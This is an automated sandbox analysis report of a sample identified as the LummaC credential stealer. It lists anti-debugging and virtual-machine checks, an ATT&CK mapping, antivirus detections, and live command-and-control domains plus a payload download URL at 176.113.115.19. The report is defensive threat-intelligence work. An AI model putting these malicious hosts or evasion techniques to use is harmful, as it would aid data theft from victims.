Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe

Code function: 1_2_0043A9B0 LdrInitializeThunk,

1_2_0043A9B0

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0042A3D3

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]	0_2_0042FE5F
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_009BAC43 push dword ptr fs:[00000030h]	0_2_009BAC43
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024B00C6 mov eax, dword ptr fs:[00000030h]	0_2_024B00C6
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_0248092B mov eax, dword ptr fs:[00000030h]	0_2_0248092B
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_02480D90 mov eax, dword ptr fs:[00000030h]	0_2_02480D90
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009F092B mov eax, dword ptr fs:[00000030h]	1_2_009F092B
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_009F0D90 mov eax, dword ptr fs:[00000030h]	1_2_009F0D90
Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe	Code function: 1_2_00AFA963 push dword ptr fs:[00000030h]	1_2_00AFA963

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

Code function: 0_2_0043BBC1 GetProcessHeap,

0_2_0043BBC1

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A3D3
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004104D3
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_00410666 SetUnhandledExceptionFilter,	0_2_00410666
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040F911
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024AA63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_024AA63A
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_0249073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0249073A
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_0248FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0248FB78
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024908CD SetUnhandledExceptionFilter,	0_2_024908CD

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: C455.tmp.exe	String found in binary or memory: debonairnukk.xyz
Source: C455.tmp.exe	String found in binary or memory: diffuculttan.xyz
Source: C455.tmp.exe	String found in binary or memory: effecterectz.xyz
Source: C455.tmp.exe	String found in binary or memory: deafeninggeh.biz
Source: C455.tmp.exe	String found in binary or memory: immureprech.biz

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

Process created: C:\Users\user\AppData\Local\Temp\C455.tmp.exe "C:\Users\user\AppData\Local\Temp\C455.tmp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

Code function: 0_2_0041077B cpuid

0_2_0041077B

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0043B00A
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: GetLocaleInfoW,	0_2_004351C0
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: EnumSystemLocalesW,	0_2_0043B2CD
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: EnumSystemLocalesW,	0_2_0043B282
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: EnumSystemLocalesW,	0_2_0043B368
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B3F5
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: GetLocaleInfoW,	0_2_0043B645
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0043B76E
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: GetLocaleInfoW,	0_2_0043B875
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B942
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: EnumSystemLocalesW,	0_2_00434DCD
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_024BB271
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: EnumSystemLocalesW,	0_2_024B5034
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: GetLocaleInfoW,	0_2_024B5427
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: EnumSystemLocalesW,	0_2_024BB4E9
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: EnumSystemLocalesW,	0_2_024BB534
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: EnumSystemLocalesW,	0_2_024BB5CF
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: GetLocaleInfoW,	0_2_024BBADC
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_024BBBA9
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: GetLocaleInfoW,	0_2_024BB8AC
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_024BB9D5

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_004103CD

Source: C:\Users\user\Desktop\TN78WX7nJU.exe

Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,

0_2_004163EA

Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 1.3.C455.tmp.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.C455.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.C455.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.C455.tmp.exe.a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1874232972.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 1.3.C455.tmp.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.C455.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.C455.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.C455.tmp.exe.a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1874232972.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_004218CC
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_00420BF6
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024A1B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_024A1B33
Source: C:\Users\user\Desktop\TN78WX7nJU.exe	Code function: 0_2_024A0E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_024A0E5D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	131 Security Software Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	22 Software Packing	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	24 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TN78WX7nJU.exe	40%	Virustotal		Browse
TN78WX7nJU.exe	45%	ReversingLabs	Win32.Trojan.LummaC
TN78WX7nJU.exe	100%	Avira	HEUR/AGEN.1312567
TN78WX7nJU.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	100%	Avira	HEUR/AGEN.1312567
C:\Users\user\AppData\Local\Temp\C455.tmp.exe	100%	Avira	HEUR/AGEN.1312567
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\C455.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	42%	ReversingLabs
C:\Users\user\AppData\Local\Temp\C455.tmp.exe	42%	ReversingLabs

Source	Detection	Scanner	Label
https://diffuculttan.xyz/api	100%	Avira URL Cloud	malware
https://wrathful-jammy.cyou/	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exe	100%	Avira URL Cloud	malware
https://community.faP	0%	Avira URL Cloud	safe
https://avatars.fastly.D	0%	Avira URL Cloud	safe
https://wrathful-jammy.cyou/?	100%	Avira URL Cloud	malware
https://wrathful-jammy.cyou/C	100%	Avira URL Cloud	malware
https://awake-weaves.cyou/apiH	100%	Avira URL Cloud	malware
https://effecterectz.xyz/x	100%	Avira URL Cloud	malware
https://deafeninggeh.biz/#	100%	Avira URL Cloud	malware
http://176.113.115.19/_	0%	Avira URL Cloud	safe
https://sordid-snaked.cyou/api~	100%	Avira URL Cloud	malware
https://effecterectz.xyz/4	100%	Avira URL Cloud	malware
https://effecterectz.xyz/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
post-to-me.com	172.67.179.207	true	false	high
steamcommunity.com	23.55.153.106	true	false	high
immureprech.biz	104.21.22.222	true	false	high
deafeninggeh.biz	104.21.96.1	true	false	high
sordid-snaked.cyou	unknown	unknown	false	high
diffuculttan.xyz	unknown	unknown	false	high
effecterectz.xyz	unknown	unknown	false	high
awake-weaves.cyou	unknown	unknown	false	high
wrathful-jammy.cyou	unknown	unknown	false	high
debonairnukk.xyz	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
sordid-snaked.cyou	false	high
deafeninggeh.biz	false	high
effecterectz.xyz	false	high
wrathful-jammy.cyou	false	high
https://steamcommunity.com/profiles/76561199724331900	false	high
awake-weaves.cyou	false	high
immureprech.biz	false	high
https://immureprech.biz/api	false	high
debonairnukk.xyz	false	high
diffuculttan.xyz	false	high
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://player.vimeo.com	C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/subscriber_agreement/	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe	TN78WX7nJU.exe, 00000000.00000003.1840353767.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000003.4091039362.0000000000A63000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000003.4091067138.0000000000A32000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.valvesoftware.com/legal.htm	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985908975.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222059436.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/	C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985908975.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222059436.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://diffuculttan.xyz/api	C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://s.ytimg.com;	C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222077563.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985978022.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/	C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.tv/	C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=&cc=DE	TN78WX7nJU.exe, 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985908975.0000000000B42000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222077563.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985978022.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wrathful-jammy.cyou/	C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/points/shop/	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sketchfab.com	C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.faP	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985978022.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com/	C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=	TN78WX7nJU.exe	false		high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
